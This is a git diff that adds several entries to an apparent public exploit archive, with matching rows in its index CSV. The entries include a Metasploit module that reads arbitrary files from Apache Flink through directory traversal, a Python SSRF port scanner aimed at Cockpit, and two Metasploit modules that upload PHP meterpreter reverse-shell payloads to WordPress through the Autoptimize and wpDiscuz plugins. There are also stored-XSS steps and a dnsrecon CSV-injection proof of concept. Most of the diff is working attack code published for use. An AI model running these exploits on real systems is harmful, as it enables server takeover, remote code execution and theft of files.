diff --git a/exploits/java/webapps/49398.rb b/exploits/java/webapps/49398.rb new file mode 100755 index 000000000..33c1cb1db --- /dev/null +++ b/exploits/java/webapps/49398.rb @@ -0,0 +1,72 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info( + info, + 'Name' => 'Apache Flink File Read Vulnerability', + 'Description' => %q{ + This module exploits an unauthenticated directory traversal vulnerability + in Apache Flink version 1.11.0 (and released in 1.11.1 and 1.11.2 as well), + allowing arbitrary file read with the web server privileges + }, + 'Author' => + [ + '0rich1 - Ant Security FG Lab', # Vulnerability discovery + 'Hoa Nguyen - Suncsr Team', # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2020-17519'], + ['URL', 'http://www.openwall.com/lists/oss-security/2021/01/05/2'], + ['URL', 'https://www.tenable.com/cve/CVE-2020-17519'] + ], + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => [['', {}]], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jan 05 2021' + + )) + + register_options([ + OptInt.new('DEPTH',[true,'Traversal Depth',12]), + OptString.new('FILEPATH',[true,'The path file to read','/etc/passwd']) + ]) + end + + def run_host(ip) + traversal = '..%252f' * datastore['DEPTH'] + filename = datastore['FILEPATH'].gsub("/","%252f") + filename = filename[1, filename.length] if filename =~ /^\// + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path,'jobmanager','logs',"#{traversal}#{filename}"), + }) + + fail_with Failure::Unreachable, 'Connection failed' unless res fail_with Failure::NotVulnerable, 'Connection failed. Nothingn was downloaded' if res.code != 200 + fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero? + + print_status('Downloading file...') + print_line("\n#{res.body}\n") + fname = datastore['FILEPATH'] + path = store_loot( + 'apache.traversal', + 'text/plain', + ip, + res.body, + fname + ) + print_good("File saved in: #{path}") + end + end \ No newline at end of file diff --git a/exploits/multiple/webapps/49397.txt b/exploits/multiple/webapps/49397.txt new file mode 100644 index 000000000..85aafcb18 --- /dev/null +++ b/exploits/multiple/webapps/49397.txt @@ -0,0 +1,88 @@ +# Exploit Title: Cockpit Version 234 - Server-Side Request Forgery (Unauthenticated) +# Date: 08.01.2021 +# Exploit Author: Metin Yunus Kandemir +# Vendor Homepage: https://cockpit-project.org/ +# Version: v234 +# Tested on: Ubuntu 18.04 + +#!/usr/bin/python3 +import argparse +import requests +import sys +import urllib3 +import time +from colorama import Fore, Style +from argparse import ArgumentParser, Namespace +from bs4 import BeautifulSoup + +""" +Example scanning for internal server: +python3 PoC.py --target 192.168.1.33:9090 --scan 172.16.16.16 --ports 21,22,23 +Example scanning for loopback interface of server: +python3 PoC.py --target 192.168.1.33:9090 +Description : https://github.com/passtheticket/vulnerability-research/tree/main/cockpitProject/README.md +""" + +def main(): + dsc = "Cockpit Version 234 - sshd Service Scanning via Server-Side Request Forgery (Unauthenticated)" + parser: ArgumentParser = argparse.ArgumentParser(description=dsc) + parser.add_argument("--target", help="IP address of Cockpit server", type=str, required=True) + parser.add_argument("--scan", help="IP address of server that will be scanned", type=str, required=False) + parser.add_argument("--ports", help="Ports (example: 21,22)", type=str, required=False) + args: Namespace = parser.parse_args() + + if args.target: + target = args.target + if args.scan: + scan = args.scan + if args.ports: + ports = args.ports + else: + ports = "22" + else: + scan = "127.0.0.1" + if args.ports: + ports = args.ports + else: + ports = "22" + cockpitReq(target, scan, ports) + +def cockpitReq(target, scan, ports): + urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + portRange = ports.split(",") + for unsafe in portRange: + headers = { + "Host": str(target), + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", + "Accept": "*/*", + "Accept-Language": "en-US,en;q=0.5", + "Accept-Encoding": "gzip, deflate", + "Authorization": "Basic dW5zYWZlOmlubGluZQ==", + "X-Authorize": "", + "Connection": "close", + "Cookie": "cockpit=deleted", + } + req = requests.get("http://" + target + "/cockpit+=" + scan + ":" + unsafe + "/login", headers, verify=False) + time.sleep(2) + soup = BeautifulSoup(req.text, 'html.parser') + responseCode = req.status_code + responseTime = str(req.elapsed) + + if responseCode == 404: + print("Cockpit server was not found!") + elif responseCode == 401: + if soup.title.string == "Authentication failed": + print(Fore.GREEN + Style.BRIGHT + "[+] Port: "+ unsafe + " sshd service is detected!") + elif soup.title.string == "Authentication failed: no-host": + if responseTime > "0:00:10.000000": + print(Fore.GREEN + Style.BRIGHT +"[-] Port: "+ unsafe + " is open, sshd service is not detected!") + else: + print(Fore.RED + Style.BRIGHT +"[-] Port: "+ unsafe + " sshd service is not detected!") + else: + print(Fore.RED + Style.BRIGHT +"[-] Error is occured!") + print("[-] One bad day!") + sys.exit(1) + else: + print("Something went wrong!") + +main() \ No newline at end of file diff --git a/exploits/php/webapps/49395.txt b/exploits/php/webapps/49395.txt new file mode 100644 index 000000000..19936b580 --- /dev/null +++ b/exploits/php/webapps/49395.txt @@ -0,0 +1,9 @@ +# Exploit Title: Life Insurance Management System 1.0 - Multiple Stored XSS +# Date: 4/1/2021 +# Exploit Author: Arnav Tripathy +# Vendor Homepage: https://www.sourcecodester.com +# Software Link: https://www.sourcecodester.com/php/14665/life-insurance-management-system-php-full-source-code.html +# Version: 1.0 +# Tested on: linux / Lamp + +Click on add payment once logged in. Put and so on in all parameters. You will notice popup once you navigate to payments. \ No newline at end of file diff --git a/exploits/php/webapps/49396.txt b/exploits/php/webapps/49396.txt new file mode 100644 index 000000000..d54e9824a --- /dev/null +++ b/exploits/php/webapps/49396.txt @@ -0,0 +1,13 @@ +# Exploit Title: Online Doctor Appointment System 1.0 - Multiple Stored XSS +# Tested on: Windows 10 +# Exploit Author: Mohamed habib Smidi (Craniums) +# Date: 2021-01-08 +# Vendor Homepage: https://www.sourcecodester.com/php/14663/online-doctor-appointment-system-php-full-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14663&title=Online+Doctor+Appointment+System+in+PHP+with+Full+Source+Code +# Affected Version: Version 1 + +Step 1: Login to the doctor account in http://TARGET/doctorappointmentsystem/adminlogin.php +Step 2: then Click on the username and go to profile +Step 3: Click on Update profile. +Step 4: Input "" in the field First Name,Last Name and Address. +Step 5: This Will trigger the payload each time you update or visit a new page. \ No newline at end of file diff --git a/exploits/php/webapps/49399.rb b/exploits/php/webapps/49399.rb new file mode 100755 index 000000000..e7433467c --- /dev/null +++ b/exploits/php/webapps/49399.rb @@ -0,0 +1,109 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HTTP::Wordpress + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info( + info, + 'Name' => 'Wordpress Autoptimize Authenticated File Upload', + 'Description' => %q{ + The ao_ccss_import AJAX call does not ensure that the file provided is a legitimate Zip file, + allowing high privilege users to upload arbitrary files, such as PHP, leading to RCE. + }, + 'Author' => + [ + 'Khanh Nguyen - Suncsr Team', # Vulnerability discovery + 'Hoa Nguyen - Suncsr Team', # Metasploit module + 'Thien Ngo - Suncsr Team' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2020-24948'], + ['EDB', '48770'], + ['WPVDB', '10372'] + ], + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'DefaultOptions' => { + 'PAYLOAD' => 'php/meterpreter/reverse_tcp' + }, + 'Targets' => [['WP Autoptimize 2.7.6', {}]], + 'DefaultTarget' => 0, + 'DisclosureDate' => '2020-08-24')) + + register_options( + [ + OptString.new('USERNAME', [true, 'The WordPress password to authenticate with', nil]), + OptString.new('PASSWORD', [true, 'The WordPress username to authenticate with', nil]) + ]) + end + + def check + check_plugin_version_from_readme('autoptimize','2.7.7') + end + + def ao_ccss_import_nonce(cookie) + res = send_request_cgi({ + 'uri' => normalize_uri(wordpress_url_backend,'options-general.php'), + 'cookie' => cookie, + 'vars_get' => { + 'page' => 'ao_critcss' + } + },5) + + if res.code == 200 + print_good("Found ao_ccss_import_nonce_code Value!") + else + fail_with(Failure::Unknown,'Server did not response in an expected way') + end + + ao_ccss_import_nonce_code = res.body.match(/'ao_ccss_import_nonce', '(\w+)/).captures[0] + return ao_ccss_import_nonce_code + end + + def exploit + username = datastore['USERNAME'] + password = datastore['PASSWORD'] + print_status("Trying to login as #{username}") + cookie = wordpress_login(datastore['USERNAME'],datastore['PASSWORD']) + if cookie.nil? + print_error("Unable to login as #{username}") + end + + vars = ao_ccss_import_nonce(cookie) + print_status("Trying to upload payload") + filename = "#{rand_text_alpha_lower(8)}.php" + + data = Rex::MIME::Message.new + data.add_part('ao_ccss_import', nil, nil, 'form-data; name="action"') + data.add_part(vars, nil, nil, 'form-data; name="ao_ccss_import_nonce"') + data.add_part(payload.encoded, 'application/zip', nil, "form-data; name=\"file\"; filename=\"#{filename}\"") + post_data = data.to_s + print_status("Uploading payload") + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(wordpress_url_backend,'admin-ajax.php'), + 'ctype' => "multipart/form-data; boundary=#{data.bound}", + 'data' => post_data, + 'cookie' => cookie + }) + + if res.code == 200 + register_files_for_cleanup(filename) + else + fail_with(Failure::Unknown,'Server did not response in an expected way') + end + + print_status("Calling uploaded file #{filename}") + send_request_cgi({'uri' => normalize_uri(wordpress_url_wp_content, 'uploads','ao_ccss',filename)},5) + end +end \ No newline at end of file diff --git a/exploits/php/webapps/49401.rb b/exploits/php/webapps/49401.rb new file mode 100755 index 000000000..220607995 --- /dev/null +++ b/exploits/php/webapps/49401.rb @@ -0,0 +1,106 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HTTP::Wordpress + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'WordPress wpDiscuz Unauthen File Upload Vulnerability', + 'Description' => %q{ + This module exploits an arbitrary file upload in the WordPress wpDiscuz plugin + version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, + including PHP files, and achieve remote code execution on a vulnerable site’s server. + }, + 'Author' => + [ + 'Chloe Chamberland', # Vulnerability Discovery, initial msf module + 'Hoa Nguyen - SunCSR' # Metasploit Module Pull Request + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['WPVDB', '10333'], + ['URL', 'https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/'], + ['URL','https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md'], + ['URL','https://plugins.trac.wordpress.org/changeset/2345429/wpdiscuz'] + ], + 'Privileged' => false, + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => [['wpDiscuz < 7.0.5', {}]], + 'DisclosureDate' => 'Feb 21 2020', + 'DefaultOptions' => + { + 'PAYLOAD' => 'php/meterpreter/reverse_tcp' + }, + 'DefaultTarget' => 0)) + + register_options [ + OptString.new('BLOGPATH',[true,'Link to the post [/index.php/2020/12/12/post1]', nil]), + ] + end + + def check + check_plugin_version_from_readme('wpdiscuz','7.0.5') + end + + def blogpath + datastore['BLOGPATH'] + end + + def find_wmusecurity_id + res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, blogpath)},5) + wmusecurity_id = res.body.match(/wmuSecurity":"(\w+)/).captures + return wmusecurity_id + end + + def exploit + wmusecurity_id = find_wmusecurity_id[0] + php_page_name = rand_text_alpha(5 + rand(5)) + '.php' + data = Rex::MIME::Message.new + data.add_part('wmuUploadFiles', nil, nil, 'form-data; name="action"') + data.add_part(wmusecurity_id, nil, nil, 'form-data; name="wmu_nonce"') + data.add_part('undefined', nil, nil, 'form-data; name="wmuAttachmentsData"') + data.add_part('1', nil, nil, 'form-data; name="postId"') + data.add_part('GIF8' + payload.encoded, 'image/gif', nil, "form-data; name=\"wmu_files[0]\"; filename=\"#{php_page_name}\"") + post_data = data.to_s + + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path ,'wp-admin', 'admin-ajax.php'), + 'method' => 'POST', + 'ctype' => "multipart/form-data; boundary=#{data.bound}", + 'data' => post_data + ) + + time = Time.new + year = time.year.to_s + month = "%02d" % time.month + + regex = res.body.match(/https?:\\\/\\\/[\w\\\/\-\.:]+\.php/) + wp_shell_upload = /\/\w+-\d+\.\d+\.php/.match(regex.to_s).to_s.tr('/',"") + + if res + if res.code == 200 && res.body =~ /#{php_page_name}/ + print_good("Payload uploaded as #{php_page_name}") + register_files_for_cleanup(php_page_name) + else + fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") + end + else + fail_with(Failure::Unknown, "#{peer} - Server did not answer") + end + + print_status("Calling payload...") + send_request_cgi( + { 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', "#{year}","#{month}",wp_shell_upload)}, + 5 + ) + + end +end \ No newline at end of file diff --git a/exploits/python/local/49394.txt b/exploits/python/local/49394.txt new file mode 100644 index 000000000..668c5999c --- /dev/null +++ b/exploits/python/local/49394.txt @@ -0,0 +1,37 @@ +# Exploit Title: dnsrecon 0.10.0 - CSV Injection +# Author: Dolev Farhi +# Date: 2021-01-07 +# Vendor Homepage: https://github.com/darkoperator/dnsrecon/ +# Version : 0.10.0 +# Tested on: ParrotOS 4.10 + +dnsrecon, when scanning a TXT record such as SPF, i.e.: _spf.domain.com, outputs a CSV report (-c out.csv) with entries such as Type,Name,Address,Target,Port and String. +A TXT record allows many characters including single quote and equal signs, it's possible to escape the CSV structure by creating a TXT record in the following way: + +_spf.example.com "test',=1+1337,'z" + + +user@parrot-virtual:~$ sudo dnsrecon -d _spf.example.com -c ./file.csv -n 8.8.8.8 +[*] Performing General Enumeration of Domain: _spf.example.com +[-] DNSSEC is not configured for _spf.example.com +[*] SOA ns-59.awsdns-07.com 205.1.1.1 +[-] Could not Resolve NS Records for _spf.example.com +[-] Could not Resolve MX Records for _spf.example.com +[*] TXT _spf.example.com test',=1+1337,'z +[*] Enumerating SRV Records +[+] 0 Records Found +[*] Saving records to CSV file: ./file.csv +{'type': 'SOA', 'mname': 'ns-59.awsdns-07.com', 'address': '205.1.1.1'} +{'type': 'TXT', 'name': '_spf.example.com', 'strings': "test',=1+1337,'z"} + + +This output will then be rewritten into a CSV with this structure: + +Type,Name,Address,Target,Port,String +SOA,ns-59.awsdns-07.com,205.1.1.1 +TXT,_spf.example.com,,,,'test',=1+1337,'z' + +The flexibility of TXT record allows many variants of formulas to be injected, from RFC1464 https://tools.ietf.org/html/rfc1464: + +Attribute Values + All printable ASCII characters are permitted in the attribute value. \ No newline at end of file diff --git a/exploits/windows/remote/46697.py b/exploits/windows/remote/46697.py index 3b65609ac..0c3040b61 100755 --- a/exploits/windows/remote/46697.py +++ b/exploits/windows/remote/46697.py @@ -5,9 +5,9 @@ # Version: 3.008 # Tested on: Windows 10 -Remote Mouse 3.008 fails to check for authenication and will execute any command any machine gives it -This script pops calc as proof of concept (albeit a bit slowly) -It also has an index of the keycodes the app uses to communicate with the computer if you want to mess around with it yourself +#Remote Mouse 3.008 fails to check for authenication and will execute any command any machine gives it +#This script pops calc as proof of concept (albeit a bit slowly) +#It also has an index of the keycodes the app uses to communicate with the computer if you want to mess around with it yourself #!/usr/bin/python2 diff --git a/exploits/windows/remote/643.c b/exploits/windows/remote/643.c index 670dd0d2f..245665a18 100644 --- a/exploits/windows/remote/643.c +++ b/exploits/windows/remote/643.c @@ -9,7 +9,7 @@ #include #include -define retadd "\x9f\x45\x3a\x77" /*win2k server sp4 0x773a459f*/ +#define retadd "\x9f\x45\x3a\x77" /*win2k server sp4 0x773a459f*/ #define port 110 /* revshell العراق القراصنة المجموعة*/ diff --git a/files_exploits.csv b/files_exploits.csv index 7fe8e8e3e..2063543ff 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11243,6 +11243,7 @@ id,file,description,date,author,type,platform,port 49379,exploits/windows/local/49379.txt,"WinAVR Version 20100110 - Insecure Folder Permissions",2021-01-06,"Mohammed Alshehri",local,windows, 49382,exploits/windows/local/49382.ps1,"PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege Escalation",2021-01-06,1F98D,local,windows, 49384,exploits/java/local/49384.txt,"H2 Database 1.4.199 - JNI Code Execution",2021-01-06,1F98D,local,java, +49394,exploits/python/local/49394.txt,"dnsrecon 0.10.0 - CSV Injection",2021-01-08,"Dolev Farhi",local,python, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -30834,7 +30835,7 @@ id,file,description,date,author,type,platform,port 26463,exploits/cgi/webapps/26463.txt,"Simple PHP Blog 0.4 - 'colors.php' Multiple Cross-Site Scripting Vulnerabilities",2005-11-02,enji@infosys.tuwien.ac.at,webapps,cgi, 26465,exploits/php/webapps/26465.txt,"CuteNews 1.4.1 - 'show_archives.php' Traversal Arbitrary File Access",2005-11-02,retrogod@aliceposta.it,webapps,php, 26466,exploits/php/webapps/26466.txt,"CuteNews 1.4.1 - 'template' Traversal Arbitrary File Access",2005-11-02,retrogod@aliceposta.it,webapps,php, -26467,exploits/php/webapps/26467.txt,"PHP Handicapper - 'Process_signup.php' HTTP Response Splitting",2005-11-03,BiPi_HaCk,webapps,php, +26467,exploits/php/webapps/26467.txt,"PHP Handicapper (2005) - 'Process_signup.php' HTTP Response Splitting",2005-11-03,BiPi_HaCk,webapps,php, 26468,exploits/php/webapps/26468.pl,"Galerie 2.4 - 'showgallery.php' SQL Injection",2005-11-03,abducter_minds@yahoo.com,webapps,php, 26469,exploits/php/webapps/26469.txt,"JPortal Web Portal 2.2.1/2.3.1 - 'comment.php' SQL Injection",2005-11-04,Mousehack,webapps,php, 26470,exploits/php/webapps/26470.txt,"JPortal Web Portal 2.2.1/2.3.1 - 'news.php' SQL Injection",2005-11-04,Mousehack,webapps,php, @@ -43601,3 +43602,9 @@ id,file,description,date,author,type,platform,port 49391,exploits/php/webapps/49391.txt,"Curfew e-Pass Management System 1.0 - Stored XSS",2021-01-07,"Arnav Tripathy",webapps,php, 49392,exploits/php/webapps/49392.txt,"ECSIMAGING PACS 6.21.5 - SQL injection",2021-01-07,shoxxdj,webapps,php, 49393,exploits/php/webapps/49393.txt,"CRUD Operation 1.0 - Multiple Stored XSS",2021-01-07,"Arnav Tripathy",webapps,php, +49395,exploits/php/webapps/49395.txt,"Life Insurance Management System 1.0 - Multiple Stored XSS",2021-01-08,"Arnav Tripathy",webapps,php, +49396,exploits/php/webapps/49396.txt,"Online Doctor Appointment System 1.0 - Multiple Stored XSS",2021-01-08,"Mohamed habib Smidi",webapps,php, +49397,exploits/multiple/webapps/49397.txt,"Cockpit Version 234 - Server-Side Request Forgery (Unauthenticated)",2021-01-08,"Metin Yunus Kandemir",webapps,multiple, +49398,exploits/java/webapps/49398.rb,"Apache Flink 1.11.0 - Unauthenticated Arbitrary File Read (Metasploit)",2021-01-08,"SunCSR Team",webapps,java, +49399,exploits/php/webapps/49399.rb,"WordPress Plugin Autoptimize 2.7.6 - Authenticated Arbitrary File Upload (Metasploit)",2021-01-08,"SunCSR Team",webapps,php, +49401,exploits/php/webapps/49401.rb,"Wordpress Plugin wpDiscuz 7.0.4 - Unauthenticated Arbitrary File Upload (Metasploit)",2021-01-08,"SunCSR Team",webapps,php,